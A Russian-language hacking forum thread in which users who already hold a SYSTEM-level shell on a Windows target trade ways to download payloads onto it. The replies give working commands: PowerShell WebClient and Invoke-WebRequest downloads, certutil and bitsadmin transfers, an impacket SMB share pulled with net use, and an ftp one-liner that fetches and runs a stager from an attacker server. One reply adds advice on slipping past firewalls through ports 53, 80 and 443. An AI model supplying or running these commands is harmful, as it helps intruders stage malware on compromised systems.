Windows shell / полезная нагрузка.

[fix_problem]

Всем привет имеем шел на винде , доступ к консоли парва системы. Дальнейшие действия , как грузать полезной нагрузки.

В гугл подсказывает:

powershell
powershell.exe Invoke-WebRequest -URI http://наш файл и т.д.

certutil
certutil.exe -urlcache -split -f http://наш файл и т.д.

bitsadmin
bitsadmin.exe /transfer "JobName" http://наш файл и т.д.

есть ли еще способы интересно.

 

[xrahitel]

LOLBAS

lolbas-project.github.io

Filesec.io

filesec.io

p.s Пригодиться тыц

 

[IIIIXX]

1. python сервер
# проверяем наличие файла
$ ls
TestFile.txt

# стартуем пайтон сервер
$ python -m SimpleHTTPServer 8080
# или
$ python3 -m http.server 8080

# на цели
# Powershell
PS:\> powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://123.21.23.34:8080/TestFile.txt','C:\Programdata\TestFile.txt')"

# certutil
C:\> certutil.exe -urlcache -split -f http://123.21.23.34:8080/TestFile.txt C:\Programdata\TestFile.txt


2. smb сервер
# ставим импакет
$ sudo apt update && sudo apt install python3 python3-pip git -y
$ git clone https://github.com/SecureAuthCorp/impacket.git
$ cd impacket/
$ ls
$ python3 setup.py install

# Поднимаем смб сервер
$ mkdir /root/publicshare
# кладем в папку файл
$ cp TestFile.txt /root/publicshare/TestFile.txt
$ python3 examples/smbserver.py datashare /root/publicshare

# на цели
C:\> net use X: \\123.21.23.34\datashare
C:\> copy X:\TestFile.txt C:\programdata\TestFile.txt

# или просто
C:\> copy \\123.21.23.34\datashare\TestFile.txt C:\programdata\TestFile.txt

источники

https://ironhackers.es/en/cheatsheet/transferir-archivos-post-explotacion-cheatsheet/
https://juggernaut-sec.com/windows-file-transfers-for-hackers/

 

[weaver]

Можно воспользоваться встроенным ftp-клиентом в windows.

cmd /c "echo get stager1.exe|ftp -A you_ftp_server.cc"
stager1.exe

раньше в некоторых шелл-кодах такое было.

есть ли еще способы интересно.

Я бы еще порекомендовал посмотреть правила IDS, там много всяких способов есть.

 

[dhampir]

As other have written, many good suggestions for files transfer. However if you are on the system, you must be think of if outbound ports are blocked by firewall, best to transfer file on port 53 80 443 common